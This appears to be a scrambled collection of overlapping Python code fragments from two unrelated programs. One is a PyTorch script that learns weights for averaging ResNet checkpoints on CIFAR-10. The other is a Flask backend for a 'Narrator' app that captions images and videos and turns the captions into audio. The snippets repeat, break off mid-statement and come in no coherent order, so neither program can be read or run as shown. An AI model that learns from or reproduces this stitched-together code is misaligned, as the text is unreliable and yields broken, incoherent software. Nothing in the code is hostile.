"experiment') parser.add_argument('--model', default='resnet18', type=str, help='model to train') parser.add_argument('--use_augm', action='store_true', help='use data augmentations?') parser.add_argument('--lr',",
"ResNet152(), # 58m 'vgg19' : VGG('VGG19'), } chpt_vanilla_dict = { 'resnet18': ['R18_1', 'R18_2',",
"criterion, best_acc): net.eval() test_loss = 0 total_samples, correct_samples = 0, 0 with torch.no_grad():",
"if not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params + alphas[ii] * checkpoint[name] ) batch",
": net.state_dict(), # 'acc' : test_acc, # 'iter' : i, # } #",
"[bs, 3, 32, 32] targets = targets.to(device) # [bs] outputs = model(inputs) loss",
"should sum to 1' num_iters = args.iter criterion = nn.CrossEntropyLoss() alphas = torch.nn.Parameter(alphas)",
"print(list(model.parameters())[0][0]) pdb.set_trace() # criterion = nn.CrossEntropyLoss() # optimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=1e-4)",
"'resnet34' : ResNet34(), # 21m 'resnet50' : ResNet50(), # 23m 'resnet101': ResNet101(), #",
"else chpt_vanilla_dict[args.model] num_models = len(model_names) print('=> Using {} models {}'.format(num_models, args.model)) model =",
"sum to 1' num_iters = args.iter criterion = nn.CrossEntropyLoss() alphas = torch.nn.Parameter(alphas) optimizer",
"test_acc, int(i / 1000) )) # state = { # 'net' : net.state_dict(),",
"sum(alphas).item() == 1, 'Alphas should sum to 1' num_iters = args.iter criterion =",
"'acc' : test_acc, # 'iter' : i, # } # torch.save(state, os.path.join(checkpoint_dir, 'net_best.pth'))",
"# } # torch.save(state, os.path.join(checkpoint_dir, 'net_best.pth')) # best_acc = test_acc if __name__ ==",
"## Create model model_names = chpt_augm_dict[args.model] if args.use_augm else chpt_vanilla_dict[args.model] num_models = len(model_names)",
"= torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") classes = ('plane', 'car', 'bird', 'cat', 'deer',",
"'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck') model_dict = { 'resnet18' :",
"'R50_augm3'], } chpt_name = 'net_80.pth' def test(model, testloader, criterion, best_acc): net.eval() test_loss =",
"= inputs.to(device) # [bs, 3, 32, 32] # targets = targets.to(device) # [bs]",
"'vgg19' : VGG('VGG19'), } chpt_vanilla_dict = { 'resnet18': ['R18_1', 'R18_2', 'R18_3'], 'resnet50': ['R50_1',",
"def main(): checkpoint_dir = 'results_ensembles/{}'.format(args.name) if not os.path.exists(checkpoint_dir): os.makedirs(checkpoint_dir) ## Logging logging.basicConfig(filename=os.path.join(checkpoint_dir, 'optim.log'),",
"every 100 iterations # if i % 100 == 0: # writer_train.add_scalar('train_acc', train_acc,",
"'optim.log'), level=logging.INFO) console = logging.StreamHandler() logging.getLogger().addHandler(console) console.setLevel(logging.INFO) logging.info(args) writer_test = SummaryWriter(log_dir=os.path.join(checkpoint_dir, 'optim')) ##",
"# test_loss, test_acc = test(net, testloader, criterion, best_acc) # logging.info('=> Saving model with",
"targets = targets.to(device) # [bs] outputs = model(inputs) loss = criterion(outputs, targets) test_loss",
"print('=> Using {} models {}'.format(num_models, args.model)) model = model_dict[args.model] model = model.to(device) model.train()",
"VGG('VGG19'), } chpt_vanilla_dict = { 'resnet18': ['R18_1', 'R18_2', 'R18_3'], 'resnet50': ['R50_1', 'R50_2', 'R50_3'],",
"'resnet18': ['R18_augm1', 'R18_augm2', 'R18_augm3'], 'resnet50': ['R50_augm1', 'R50_augm2', 'R50_augm3'], } chpt_name = 'net_80.pth' def",
"Create model model_names = chpt_augm_dict[args.model] if args.use_augm else chpt_vanilla_dict[args.model] num_models = len(model_names) print('=>",
"to init weight as required torch.manual_seed(0) device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")",
"parser.add_argument('--use_augm', action='store_true', help='use data augmentations?') parser.add_argument('--lr', default=1e-2, type=float, help='learning rate') parser.add_argument('--iter', default=100, type=int,",
"/ total_samples # # log metrics to TB every 100 iterations # if",
"len(testset), batch_size = 1000, shuffle = False, # sampler = data_sampler(testset, shuffle=False), num_workers",
"break # train_loss = 0 # total_samples, correct_samples = 0, 0 # batch",
"num_models = len(model_names) print('=> Using {} models {}'.format(num_models, args.model)) model = model_dict[args.model] model",
"/ total_samples total_test_loss = test_loss / (batch_idx+1) return total_test_loss, test_acc def main(): checkpoint_dir",
"'ship', 'truck') model_dict = { 'resnet18' : ResNet18(), # 11m params 'resnet34' :",
"args.iter: # print(\"TRAINING IS DONE!\") # break # train_loss = 0 # total_samples,",
"os.path.exists(checkpoint_dir): os.makedirs(checkpoint_dir) ## Logging logging.basicConfig(filename=os.path.join(checkpoint_dir, 'optim.log'), level=logging.INFO) console = logging.StreamHandler() logging.getLogger().addHandler(console) console.setLevel(logging.INFO) logging.info(args)",
"3, 32, 32] # targets = targets.to(device) # [bs] # outputs = net(inputs)",
"# if i % args.iter_save == 0: # test_loss, test_acc = test(net, testloader,",
"batch # inputs = inputs.to(device) # [bs, 3, 32, 32] # targets =",
"'iter' : i, # } # torch.save(state, os.path.join(checkpoint_dir, 'net_{}.pth'.format( int( i / 1000)",
"at iteration {} K'.format(test_loss, test_acc, int( i / 1000)) ) # state =",
"= model(inputs) loss = criterion(outputs, targets) test_loss += loss.item() _, predicted = outputs.max(1)",
"nn import torch.optim as optim import torch.nn.functional as F import torch.backends.cudnn as cudnn",
"use this to init weight as required torch.manual_seed(0) device = torch.device(\"cuda\" if torch.cuda.is_available()",
"targets) in enumerate(testloader): inputs = inputs.to(device) # [bs, 3, 32, 32] targets =",
"not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params + alphas[ii] * checkpoint[name] ) batch =",
"+= loss.item() _, predicted = outputs.max(1) total_samples += targets.size(0) correct_samples += predicted.eq(targets).sum().item() #",
"inputs = inputs.to(device) # [bs, 3, 32, 32] # targets = targets.to(device) #",
"outputs = model(inputs) loss = criterion(outputs, targets) print(alphas) # print(list(model.parameters())[0][0]) optimizer.zero_grad() loss.backward() optimizer.step()",
"['R50_augm1', 'R50_augm2', 'R50_augm3'], } chpt_name = 'net_80.pth' def test(model, testloader, criterion, best_acc): net.eval()",
"model = model_dict[args.model] model = model.to(device) model.train() ## Init alphas and optimizer alphas",
"+= predicted.eq(targets).sum().item() # train_acc = correct_samples / total_samples # # log metrics to",
"Preparing data..') transform_test = transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)), ])",
"# scheduler.step() # train_loss += loss.item() # _, predicted = outputs.max(1) # total_samples",
"writer_test.add_scalar('test_acc', test_acc, i) # writer_test.add_scalar('test_loss', test_loss, i) # if test_acc > best_acc: #",
"help='learning rate') parser.add_argument('--iter', default=100, type=int, help='number of total iterations to run') args =",
"'resnet50': ['R50_augm1', 'R50_augm2', 'R50_augm3'], } chpt_name = 'net_80.pth' def test(model, testloader, criterion, best_acc):",
"--> {} at iteration {} K'.format(best_acc, test_acc, int(i / 1000) )) # state",
"> args.iter: # print(\"TRAINING IS DONE!\") # break # train_loss = 0 #",
"at TB test_acc = 100. * correct_samples / total_samples total_test_loss = test_loss /",
"= torchvision.datasets.CIFAR10(root='data', train=False, download=True, transform=transform_test) testloader = torch.utils.data.DataLoader( testset, # batch_size = len(testset),",
"= logging.StreamHandler() logging.getLogger().addHandler(console) console.setLevel(logging.INFO) logging.info(args) writer_test = SummaryWriter(log_dir=os.path.join(checkpoint_dir, 'optim')) ## Data print('=> Preparing",
"32] targets = targets.to(device) # [bs] outputs = model(inputs) loss = criterion(outputs, targets)",
"'horse', 'ship', 'truck') model_dict = { 'resnet18' : ResNet18(), # 11m params 'resnet34'",
"torchvision.datasets.CIFAR10(root='data', train=False, download=True, transform=transform_test) testloader = torch.utils.data.DataLoader( testset, # batch_size = len(testset), batch_size",
"help='name of experiment') parser.add_argument('--model', default='resnet18', type=str, help='model to train') parser.add_argument('--use_augm', action='store_true', help='use data",
"# 23m 'resnet101': ResNet101(), # 42m 'resnet152': ResNet152(), # 58m 'vgg19' : VGG('VGG19'),",
"save loss over the whole test set at TB test_acc = 100. *",
"enumerate(testloader): inputs = inputs.to(device) # [bs, 3, 32, 32] targets = targets.to(device) #",
"torch.nn.Parameter(alphas) optimizer = optim.Adam([alphas], lr=args.lr, betas=(0.9, 0.999)) ### Main optimization loop ## TODO:",
"i > args.iter: # print(\"TRAINING IS DONE!\") # break # train_loss = 0",
"# torch.save(state, os.path.join(checkpoint_dir, 'net_best.pth')) # best_acc = test_acc if __name__ == '__main__': main()",
"torchvision import torchvision.transforms as transforms from models import * parser = argparse.ArgumentParser() parser.add_argument('--name',",
"0 with torch.no_grad(): for batch_idx, (inputs, targets) in enumerate(testloader): inputs = inputs.to(device) #",
"alphas = torch.rand(num_models) / num_models alphas[-1] = 1 - sum(alphas[:-1]) assert sum(alphas).item() ==",
"alphas = torch.nn.Parameter(alphas) optimizer = optim.Adam([alphas], lr=args.lr, betas=(0.9, 0.999)) ### Main optimization loop",
"iter(testloader) ## Create model model_names = chpt_augm_dict[args.model] if args.use_augm else chpt_vanilla_dict[args.model] num_models =",
"from models import * parser = argparse.ArgumentParser() parser.add_argument('--name', default='', type=str, help='name of experiment')",
"ResNet101(), # 42m 'resnet152': ResNet152(), # 58m 'vgg19' : VGG('VGG19'), } chpt_vanilla_dict =",
"logging.info(args) writer_test = SummaryWriter(log_dir=os.path.join(checkpoint_dir, 'optim')) ## Data print('=> Preparing data..') transform_test = transforms.Compose([",
"models import * parser = argparse.ArgumentParser() parser.add_argument('--name', default='', type=str, help='name of experiment') parser.add_argument('--model',",
"outputs.max(1) total_samples += targets.size(0) correct_samples += predicted.eq(targets).sum().item() # save loss over the whole",
"= data_sampler(testset, shuffle=False), num_workers = 4, ) loader = iter(testloader) ## Create model",
"in range(num_iters): # load model weights and multiply with alphas for ii, model_name",
"= outputs.max(1) # total_samples += targets.size(0) # correct_samples += predicted.eq(targets).sum().item() # train_acc =",
"over the whole test set at TB test_acc = 100. * correct_samples /",
"= nn.CrossEntropyLoss() alphas = torch.nn.Parameter(alphas) optimizer = optim.Adam([alphas], lr=args.lr, betas=(0.9, 0.999)) ### Main",
"len(model_names) print('=> Using {} models {}'.format(num_models, args.model)) model = model_dict[args.model] model = model.to(device)",
"model_params + alphas[ii] * checkpoint[name] ) batch = next(loader) inputs, targets = batch",
"ResNet34(), # 21m 'resnet50' : ResNet50(), # 23m 'resnet101': ResNet101(), # 42m 'resnet152':",
"= { 'resnet18': ['R18_1', 'R18_2', 'R18_3'], 'resnet50': ['R50_1', 'R50_2', 'R50_3'], } chpt_augm_dict =",
"0.1994, 0.2010)), ]) testset = torchvision.datasets.CIFAR10(root='data', train=False, download=True, transform=transform_test) testloader = torch.utils.data.DataLoader( testset,",
"= torch.nn.Parameter( model_params * alphas[ii] ) else: for name, model_params in model.named_parameters(): if",
"# print(list(model.parameters())[0][0]) optimizer.zero_grad() loss.backward() optimizer.step() print(alphas) # print(list(model.parameters())[0][0]) pdb.set_trace() # criterion = nn.CrossEntropyLoss()",
"ACC: {} at iteration {} K'.format(test_loss, test_acc, int( i / 1000)) ) #",
"i % 100 == 0: # writer_train.add_scalar('train_acc', train_acc, i) # writer_train.add_scalar('train_loss', train_loss, i)",
"# writer_train.add_scalar('train_acc', train_acc, i) # writer_train.add_scalar('train_loss', train_loss, i) # # test model and",
"False, # sampler = data_sampler(testset, shuffle=False), num_workers = 4, ) loader = iter(testloader)",
"total_samples # # log metrics to TB every 100 iterations # if i",
"inputs, targets = batch inputs = inputs.to(device) targets = targets.to(device) outputs = model(inputs)",
"= targets.to(device) outputs = model(inputs) loss = criterion(outputs, targets) print(alphas) # print(list(model.parameters())[0][0]) optimizer.zero_grad()",
"momentum=0.9, weight_decay=1e-4) # for idx in pbar: # i = idx + args.start_iter",
"= batch # inputs = inputs.to(device) # [bs, 3, 32, 32] # targets",
"TB every 100 iterations # if i % 100 == 0: # writer_train.add_scalar('train_acc',",
"chpt_augm_dict = { 'resnet18': ['R18_augm1', 'R18_augm2', 'R18_augm3'], 'resnet50': ['R50_augm1', 'R50_augm2', 'R50_augm3'], } chpt_name",
"torchvision.transforms as transforms from models import * parser = argparse.ArgumentParser() parser.add_argument('--name', default='', type=str,",
"'R18_3'], 'resnet50': ['R50_1', 'R50_2', 'R50_3'], } chpt_augm_dict = { 'resnet18': ['R18_augm1', 'R18_augm2', 'R18_augm3'],",
"# } # torch.save(state, os.path.join(checkpoint_dir, 'net_{}.pth'.format( int( i / 1000) ))) # net.train()",
"def test(model, testloader, criterion, best_acc): net.eval() test_loss = 0 total_samples, correct_samples = 0,",
"with torch.no_grad(): for batch_idx, (inputs, targets) in enumerate(testloader): inputs = inputs.to(device) # [bs,",
"'resnet152': ResNet152(), # 58m 'vgg19' : VGG('VGG19'), } chpt_vanilla_dict = { 'resnet18': ['R18_1',",
"weights and multiply with alphas for ii, model_name in enumerate(model_names): model_path = os.path.join('results',",
"K'.format(test_loss, test_acc, int( i / 1000)) ) # state = { # 'net'",
"+ alphas[ii] * checkpoint[name] ) batch = next(loader) inputs, targets = batch inputs",
"train_acc, i) # writer_train.add_scalar('train_loss', train_loss, i) # # test model and save it",
"- sum(alphas[:-1]) assert sum(alphas).item() == 1, 'Alphas should sum to 1' num_iters =",
"name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params + alphas[ii] * checkpoint[name] ) batch = next(loader)",
"-- ACC: {} at iteration {} K'.format(test_loss, test_acc, int( i / 1000)) )",
"args.model)) model = model_dict[args.model] model = model.to(device) model.train() ## Init alphas and optimizer",
"issue for it in range(num_iters): # load model weights and multiply with alphas",
"test_acc, int( i / 1000)) ) # state = { # 'net' :",
"{} at iteration {} K'.format(best_acc, test_acc, int(i / 1000) )) # state =",
"for name, model_params in model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params +",
"this to init weight as required torch.manual_seed(0) device = torch.device(\"cuda\" if torch.cuda.is_available() else",
"ii, model_name in enumerate(model_names): model_path = os.path.join('results', model_name, chpt_name) checkpoint = torch.load(model_path)['net'] if",
"DONE!\") # break # train_loss = 0 # total_samples, correct_samples = 0, 0",
"lr=args.lr, betas=(0.9, 0.999)) ### Main optimization loop ## TODO: alphas are not updating",
"multiply with alphas for ii, model_name in enumerate(model_names): model_path = os.path.join('results', model_name, chpt_name)",
"torch.no_grad(): for batch_idx, (inputs, targets) in enumerate(testloader): inputs = inputs.to(device) # [bs, 3,",
"targets = targets.to(device) # [bs] # outputs = net(inputs) # loss = criterion(outputs,",
"['R18_1', 'R18_2', 'R18_3'], 'resnet50': ['R50_1', 'R50_2', 'R50_3'], } chpt_augm_dict = { 'resnet18': ['R18_augm1',",
"improved from {} --> {} at iteration {} K'.format(best_acc, test_acc, int(i / 1000)",
"# optimizer.zero_grad() # loss.backward() # optimizer.step() # scheduler.step() # train_loss += loss.item() #",
"torch.manual_seed(0) device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") classes = ('plane', 'car', 'bird',",
"targets.to(device) outputs = model(inputs) loss = criterion(outputs, targets) print(alphas) # print(list(model.parameters())[0][0]) optimizer.zero_grad() loss.backward()",
"state = { # 'net' : net.state_dict(), # 'acc' : test_acc, # 'iter'",
"SummaryWriter import torchvision import torchvision.transforms as transforms from models import * parser =",
"} # torch.save(state, os.path.join(checkpoint_dir, 'net_{}.pth'.format( int( i / 1000) ))) # net.train() #",
"# 'iter' : i, # } # torch.save(state, os.path.join(checkpoint_dir, 'net_best.pth')) # best_acc =",
"print(alphas) # print(list(model.parameters())[0][0]) optimizer.zero_grad() loss.backward() optimizer.step() print(alphas) # print(list(model.parameters())[0][0]) pdb.set_trace() # criterion =",
"test_acc, # 'iter' : i, # } # torch.save(state, os.path.join(checkpoint_dir, 'net_best.pth')) # best_acc",
"name, model_params in model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params + alphas[ii]",
"* correct_samples / total_samples total_test_loss = test_loss / (batch_idx+1) return total_test_loss, test_acc def",
"for idx in pbar: # i = idx + args.start_iter # if i",
"inputs = inputs.to(device) targets = targets.to(device) outputs = model(inputs) loss = criterion(outputs, targets)",
"torch.load(model_path)['net'] if ii==0: model.load_state_dict(checkpoint) for name, model_params in model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params",
"data..') transform_test = transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)), ]) testset",
"net(inputs) # loss = criterion(outputs, targets) # optimizer.zero_grad() # loss.backward() # optimizer.step() #",
"test_acc def main(): checkpoint_dir = 'results_ensembles/{}'.format(args.name) if not os.path.exists(checkpoint_dir): os.makedirs(checkpoint_dir) ## Logging logging.basicConfig(filename=os.path.join(checkpoint_dir,",
"if torch.cuda.is_available() else \"cpu\") classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog',",
"targets) test_loss += loss.item() _, predicted = outputs.max(1) total_samples += targets.size(0) correct_samples +=",
"parser.add_argument('--model', default='resnet18', type=str, help='model to train') parser.add_argument('--use_augm', action='store_true', help='use data augmentations?') parser.add_argument('--lr', default=1e-2,",
"TB test_acc = 100. * correct_samples / total_samples total_test_loss = test_loss / (batch_idx+1)",
"(batch_idx+1) return total_test_loss, test_acc def main(): checkpoint_dir = 'results_ensembles/{}'.format(args.name) if not os.path.exists(checkpoint_dir): os.makedirs(checkpoint_dir)",
"'results_ensembles/{}'.format(args.name) if not os.path.exists(checkpoint_dir): os.makedirs(checkpoint_dir) ## Logging logging.basicConfig(filename=os.path.join(checkpoint_dir, 'optim.log'), level=logging.INFO) console = logging.StreamHandler()",
"# use this to init weight as required torch.manual_seed(0) device = torch.device(\"cuda\" if",
"argparse import torch import torch.nn as nn import torch.optim as optim import torch.nn.functional",
"model_names = chpt_augm_dict[args.model] if args.use_augm else chpt_vanilla_dict[args.model] num_models = len(model_names) print('=> Using {}",
"test_acc > best_acc: # logging.info('=> Accuracy improved from {} --> {} at iteration",
"= outputs.max(1) total_samples += targets.size(0) correct_samples += predicted.eq(targets).sum().item() # save loss over the",
"weight_decay=1e-4) # for idx in pbar: # i = idx + args.start_iter #",
"num_iters = args.iter criterion = nn.CrossEntropyLoss() alphas = torch.nn.Parameter(alphas) optimizer = optim.Adam([alphas], lr=args.lr,",
"optim import torch.nn.functional as F import torch.backends.cudnn as cudnn from torch.utils.tensorboard import SummaryWriter",
"'R50_2', 'R50_3'], } chpt_augm_dict = { 'resnet18': ['R18_augm1', 'R18_augm2', 'R18_augm3'], 'resnet50': ['R50_augm1', 'R50_augm2',",
"))) # net.train() # writer_test.add_scalar('test_acc', test_acc, i) # writer_test.add_scalar('test_loss', test_loss, i) # if",
"nn.CrossEntropyLoss() # optimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=1e-4) # for idx in pbar:",
"test_acc, i) # writer_test.add_scalar('test_loss', test_loss, i) # if test_acc > best_acc: # logging.info('=>",
"test model and save it every 5000 iterations # if i % args.iter_save",
"in pbar: # i = idx + args.start_iter # if i > args.iter:",
"model(inputs) loss = criterion(outputs, targets) print(alphas) # print(list(model.parameters())[0][0]) optimizer.zero_grad() loss.backward() optimizer.step() print(alphas) #",
"total_samples, correct_samples = 0, 0 # batch = next(loader) # inputs, targets =",
"# batch = next(loader) # inputs, targets = batch # inputs = inputs.to(device)",
"% 100 == 0: # writer_train.add_scalar('train_acc', train_acc, i) # writer_train.add_scalar('train_loss', train_loss, i) #",
"0.2010)), ]) testset = torchvision.datasets.CIFAR10(root='data', train=False, download=True, transform=transform_test) testloader = torch.utils.data.DataLoader( testset, #",
"]) testset = torchvision.datasets.CIFAR10(root='data', train=False, download=True, transform=transform_test) testloader = torch.utils.data.DataLoader( testset, # batch_size",
"'net_{}.pth'.format( int( i / 1000) ))) # net.train() # writer_test.add_scalar('test_acc', test_acc, i) #",
": i, # } # torch.save(state, os.path.join(checkpoint_dir, 'net_best.pth')) # best_acc = test_acc if",
"### Main optimization loop ## TODO: alphas are not updating -- solve this",
"default='', type=str, help='name of experiment') parser.add_argument('--model', default='resnet18', type=str, help='model to train') parser.add_argument('--use_augm', action='store_true',",
"testset = torchvision.datasets.CIFAR10(root='data', train=False, download=True, transform=transform_test) testloader = torch.utils.data.DataLoader( testset, # batch_size =",
"# 42m 'resnet152': ResNet152(), # 58m 'vgg19' : VGG('VGG19'), } chpt_vanilla_dict = {",
"idx + args.start_iter # if i > args.iter: # print(\"TRAINING IS DONE!\") #",
")) # state = { # 'net' : net.state_dict(), # 'acc' : test_acc,",
"log metrics to TB every 100 iterations # if i % 100 ==",
"classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck') model_dict",
"parser = argparse.ArgumentParser() parser.add_argument('--name', default='', type=str, help='name of experiment') parser.add_argument('--model', default='resnet18', type=str, help='model",
"total_samples total_test_loss = test_loss / (batch_idx+1) return total_test_loss, test_acc def main(): checkpoint_dir =",
"targets.to(device) # [bs] # outputs = net(inputs) # loss = criterion(outputs, targets) #",
"default=1e-2, type=float, help='learning rate') parser.add_argument('--iter', default=100, type=int, help='number of total iterations to run')",
"level=logging.INFO) console = logging.StreamHandler() logging.getLogger().addHandler(console) console.setLevel(logging.INFO) logging.info(args) writer_test = SummaryWriter(log_dir=os.path.join(checkpoint_dir, 'optim')) ## Data",
"torch.utils.tensorboard import SummaryWriter import torchvision import torchvision.transforms as transforms from models import *",
"model_params * alphas[ii] ) else: for name, model_params in model.named_parameters(): if not name.endswith('num_batches_tracked'):",
"= args.iter criterion = nn.CrossEntropyLoss() alphas = torch.nn.Parameter(alphas) optimizer = optim.Adam([alphas], lr=args.lr, betas=(0.9,",
"/ num_models alphas[-1] = 1 - sum(alphas[:-1]) assert sum(alphas).item() == 1, 'Alphas should",
"= optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=1e-4) # for idx in pbar: # i ="
] |
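# --- Illustrative aside (not part of the original script) --------------------
# The assert in main() only checks the *initial* alphas (and an exact float
# comparison with 1 is fragile; torch.isclose is safer). Nothing keeps the
# alphas on the probability simplex once Adam starts stepping. A common fix is
# to optimise unconstrained logits and softmax them each iteration; a minimal
# sketch with a hypothetical 3-model ensemble:
_logits = torch.nn.Parameter(torch.zeros(3))
_alpha_opt = optim.Adam([_logits], lr=1e-2)

def current_alphas():
    """Always a valid convex combination: non-negative and summing to 1."""
    return torch.softmax(_logits, dim=0)
# ------------------------------------------------------------------------------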
# ============================================================================
# Second source file: Flask backend of the Narrator web app
# ============================================================================

""" Backend of Narrator web app. """
import os
import sys
import shutil
import pandas as pd
import skimage.io as io  # the source only shows "... as io"; skimage.io matches the io.imread(url) calls below
import PIL
from flask import render_template, request, redirect, url_for, send_from_directory, session
from app import app
sys.path.append(app.config['COCOAPI_PATH'] + 'PythonAPI')
from pycocotools.coco import COCO
sys.path.append('../src/')
from Narrator import Narrator

# Construct classes
narrator = Narrator(
    root_path=app.config['ROOT_PATH'],
    coco_vocab_path=app.config['COCO_VOCAB_PATH'],
    msrvtt_vocab_path=app.config['MSRVTT_VOCAB_PATH'],
    base_model=app.config['ENCODER_MODEL'],
    ic_model_path=app.config['IC_MODEL_PATH'],
    vc_model_path=app.config['VC_MODEL_PATH'],
    ic_rnn_type=app.config['IC_RNN_TYPE'],
    vc_rnn_type=app.config['VC_RNN_TYPE']
)

# Load samples from file
try:
    samplesDF = pd.read_csv(app.config['SAMPLES_DIR'] + 'sample_captions.csv', index_col=0)
except:
    samplesDF = pd.DataFrame(columns=['id', 'caption', 'gt'], index=['name']).head()

# Update any existing samples
if len(app.config['SAMPLES_TO_UPDATE']) > 0:
    # Load image and video datasets
    coco = COCO(app.config['COCOAPI_PATH'] + 'annotations/instances_{}.json'.format(app.config['COCO_SET']))
    cocoCaptionDF = pd.read_csv(app.config['COCOAPI_PATH'] + 'annotations/coco_captions.csv')
    msrvttCaptionDF = pd.read_csv(app.config['MSRVTT_CAPTION_PATH'])

    # Determine images and videos to update
    im_names = [x for x in app.config['SAMPLES_TO_UPDATE'] if 'image' in x]
    vid_names = [x for x in app.config['SAMPLES_TO_UPDATE'] if 'video' in x]

    # Randomly select ids from their respective datasets and reject any that
    # already have been chosen
    rand_im_ids = cocoCaptionDF[cocoCaptionDF['set'] == app.config['COCO_SET']].sample(n=32)['id'].values.tolist()
    rand_im_ids = [x for x in rand_im_ids if x not in samplesDF['id'].values.tolist()][:len(im_names)]
    rand_vid_ids = msrvttCaptionDF[msrvttCaptionDF['set'] == 'test'].sample(n=32)['vid_id'].values.tolist()
    rand_vid_ids = [x for x in rand_vid_ids if x not in samplesDF['id'].values.tolist()][:len(vid_names)]

    # Generate sample information and store to file
    for i, (name, im_id) in enumerate(zip(im_names, rand_im_ids)):
        # Get image and generated caption
        url = coco.loadImgs(im_id)[0]['coco_url']
        caption = narrator.gen_caption(url, beam_size=8)

        # Get all gt captions and encode/decode using vocabulary
        gts = cocoCaptionDF[cocoCaptionDF['id'] == im_id]['caption']
        gts = gts.apply(lambda x: narrator.coco_vocab.encode(x, app.config['MAX_LEN'] + 1))
        gts = gts.apply(lambda x: narrator.coco_vocab.decode(x, clean=True))

        # Find the nearest gt
        nearest_gt = ''
        best_score = 0.0
        for gt in gts:
            bleu = narrator.coco_vocab.evaluate([gt], caption)
            if bleu > best_score:
                best_score = bleu
                nearest_gt = gt
        gt = ' '.join(nearest_gt).capitalize()
        caption = ' '.join(caption).capitalize()

        # Load and save image
        im = PIL.Image.fromarray(io.imread(url)).convert('RGB')
        im.save(app.config['SAMPLES_DIR'] + name + '.jpg')

        # Generate audio files
        narrator.gen_audio_file(gt, app.config['SAMPLES_DIR'] + name + '_gt.ogg')
        narrator.gen_audio_file(caption, app.config['SAMPLES_DIR'] + name + '.ogg')

        # Update samples dataframe
        samplesDF.loc[name, 'id'] = im_id
        samplesDF.loc[name, 'caption'] = caption
        samplesDF.loc[name, 'gt'] = gt
    print('Images updated!')

    for i, (name, vid_id) in enumerate(zip(vid_names, rand_vid_ids)):
        # Get video and generated caption
        url = app.config['MSRVTT_DATA_PATH'] + vid_id + '.mp4'
        caption = narrator.gen_caption(url, beam_size=8)

        # Get all gt captions and encode/decode using vocabulary
        gts = msrvttCaptionDF[msrvttCaptionDF['vid_id'] == vid_id]['caption']
        gts = gts.apply(lambda x: narrator.msrvtt_vocab.encode(x, app.config['MAX_LEN'] + 1))
        gts = gts.apply(lambda x: narrator.msrvtt_vocab.decode(x, clean=True))

        # Find the nearest gt
        nearest_gt = ''
        best_score = 0.0
        for gt in gts:
            bleu = narrator.msrvtt_vocab.evaluate([gt], caption)
            if bleu > best_score:
                best_score = bleu
                nearest_gt = gt
        gt = ' '.join(nearest_gt).capitalize()
        caption = ' '.join(caption).capitalize()

        # Copy video to samples directory
        shutil.copy(url, app.config['SAMPLES_DIR'] + name + '.mp4')

        # Generate audio files
        narrator.gen_audio_file(gt, app.config['SAMPLES_DIR'] + name + '_gt.ogg')
        narrator.gen_audio_file(caption, app.config['SAMPLES_DIR'] + name + '.ogg')

        # update samples dataframe
        samplesDF.loc[name, 'id'] = vid_id
        samplesDF.loc[name, 'caption'] = caption
        samplesDF.loc[name, 'gt'] = gt
    print('Videos updated!')

    # Save samples dataframe
    samplesDF.to_csv(app.config['SAMPLES_DIR'] + 'sample_captions.csv')
"+ str(i) + '.ogg', 'caption': caption.capitalize() }) session['scenes_dict'] = scenes_dict return redirect(url_for('uploaded_file', filename=file.filename,",
"'annotations/coco_captions.csv') msrvttCaptionDF = pd.read_csv(app.config['MSRVTT_CAPTION_PATH']) # Determine images and videos to update im_names =",
"narrator.gen_audio_file( gt, app.config['SAMPLES_DIR'] + name + '_gt.ogg') narrator.gen_audio_file( caption, app.config['SAMPLES_DIR'] + name +",
"image and video datasets coco = COCO(app.config[ 'COCOAPI_PATH'] + 'annotations/instances_{}.json'.format(app.config['COCO_SET'])) cocoCaptionDF = pd.read_csv(",
"examples page.\"\"\" return render_template('videos.html', vid_dict=VID_SAMPLES_DICT, page='videos', title=app.config['TITLE']) @app.route('/scenes') def scenes(): \"\"\"Render scene examples",
"scenes_dict = [] for i, caption in enumerate(captions): narrator.gen_audio_file(caption, app.config['UPLOAD_DIR'] + filename +",
"+ str(ix)] vid_sample = samplesDF.loc['video' + str(ix)] IM_SAMPLES_DICT[int(i / 4)].append({ 'id': im_sample['id'], 'url':",
"\"\"\"Render scene examples page.\"\"\" return render_template('scenes.html', page='scenes', scenes_dict=SCENE_SAMPLES_DICT, title=app.config['TITLE']) @app.route('/contact') def contact(): \"\"\"Render",
"as_string=True, by_scene=by_scene).capitalize() cap_audio = filename + '.ogg' narrator.gen_audio_file( caption, app.config['UPLOAD_DIR'] + cap_audio) return",
"generated caption url = app.config['MSRVTT_DATA_PATH'] + vid_id + '.mp4' caption = narrator.gen_caption(url, beam_size=8)",
"app.config['ALLOWED_EXTENSIONS'] def save_file(file): \"\"\"Save given file and return path.\"\"\" file_path = os.path.join(app.config['UPLOAD_DIR'], file.filename)",
"rand_vid_ids if x not in samplesDF['id'].values.tolist()][ :len(vid_names)] # Generate sample information and store",
"images and videos to update im_names = [x for x in app.config['SAMPLES_TO_UPDATE'] if",
"cap_audio = filename + '.ogg' narrator.gen_audio_file( caption, app.config['UPLOAD_DIR'] + cap_audio) return redirect(url_for('uploaded_file', filename=file.filename,",
"+ cap_audio) return redirect(url_for('uploaded_file', filename=file.filename, cap_audio=cap_audio, caption=caption, typ=typ)) # Generate caption/audio by scene",
"from website file = request.files['file'] by_scene = 'by_scene' in request.form # Check if",
"'.csv') # Load scene example SCENE_SAMPLES_DICT = [] for i, row in sceneSamplesDF.iterrows():",
